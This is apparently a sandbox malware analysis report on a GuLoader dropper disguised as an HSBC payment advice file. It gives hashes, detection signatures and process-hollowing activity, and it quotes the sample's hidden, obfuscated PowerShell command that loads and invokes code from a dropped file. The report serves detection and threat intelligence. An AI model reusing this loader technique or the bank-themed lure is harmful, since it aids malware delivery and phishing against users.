Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HSBC Payment Advice.exe

Overview

General Information

Sample name:HSBC Payment Advice.exe
Analysis ID:1533042
MD5:b9138cef86a6c7324bec281bb7fa3e00
SHA1:0d8d3ec170c54904dd6c7f87e6f8418810f8ecfb
SHA256:b3eedff35f3202a6614d84582160de6b56c0bcd26f698c34b17d03c20d923c17
Infos:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Sample uses process hollowing technique
Suspicious powershell command line found
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • HSBC Payment Advice.exe (PID: 3048 cmdline: "C:\Users\user\Desktop\HSBC Payment Advice.exe" MD5: B9138CEF86A6C7324BEC281BB7FA3E00)
    • powershell.exe (PID: 2088 cmdline: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • msiexec.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7952 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4892 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4496 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6812 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7120 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6392 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7340 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1716 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 544 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7920 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4088 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 4400 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5972 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 7688 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5524 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2712 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 1676 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5396 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 5956 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • msiexec.exe (PID: 2384 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2216 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5676 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1620 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7272 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1056 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 2408 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1900 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 1444 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • dxdiag.exe (PID: 4384 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2344 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 2784 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8200 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8208 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8216 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • dxdiag.exe (PID: 8224 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.91928114130.0000000008F22000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", CommandLine: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HSBC Payment Advice.exe", ParentImage: C:\Users\user\Desktop\HSBC Payment Advice.exe, ParentProcessId: 3048, ParentProcessName: HSBC Payment Advice.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) ", ProcessId: 2088, ProcessName: powershell.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for domain / URL
    Source: http://pesterbdd.com/images/Pester.pngVirustotal: Detection: 10%Perma Link
    Source: http://pesterbdd.com/images/Pester.png4Virustotal: Detection: 10%Perma Link
    Multi AV Scanner detection for submitted file
    Source: HSBC Payment Advice.exeVirustotal: Detection: 21%Perma Link
    Source: HSBC Payment Advice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: CallSite.Targetore.pdb) source: powershell.exe, 00000002.00000002.91926000124.00000000086E1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000002.00000002.91926485061.00000000087A0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbn source: powershell.exe, 00000002.00000002.91922466152.00000000072D7000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040622B FindFirstFileW,FindClose,0_2_0040622B
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405770
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: HSBC Payment Advice.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000002.00000002.91916766120.0000000004DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
    Source: powershell.exe, 00000002.00000002.91920817915.0000000005CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000002.00000002.91915306840.0000000002D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

    System Summary

    barindex
    Initial sample is a PE file and has a suspicious name
    Source: initial sampleStatic PE information: Filename: HSBC Payment Advice.exe
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_00404B0E0_2_00404B0E
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040653D0_2_0040653D
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0464EC282_2_0464EC28
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04649AE82_2_04649AE8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0464EC182_2_0464EC18
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04641D002_2_04641D00
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08E01AC82_2_08E01AC8
    Source: HSBC Payment Advice.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal92.troj.evad.winEXE@4590/16@0/0
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Users\user\AppData\Roaming\daaselatterenJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:304:WilStaging_02
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile created: C:\Users\user\AppData\Local\Temp\nsdD9B9.tmpJump to behavior
    Source: HSBC Payment Advice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: HSBC Payment Advice.exeVirustotal: Detection: 21%
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeFile read: C:\Users\user\Desktop\HSBC Payment Advice.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe"
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"
    Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Finurligheden=Get-Content -raw 'C:\Users\user\AppData\Roaming\daaselatteren\Vrdireduktion\tidsserier.Adj';$nijholt=$Finurligheden.SubString(56673,3);.$nijholt($Finurligheden) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
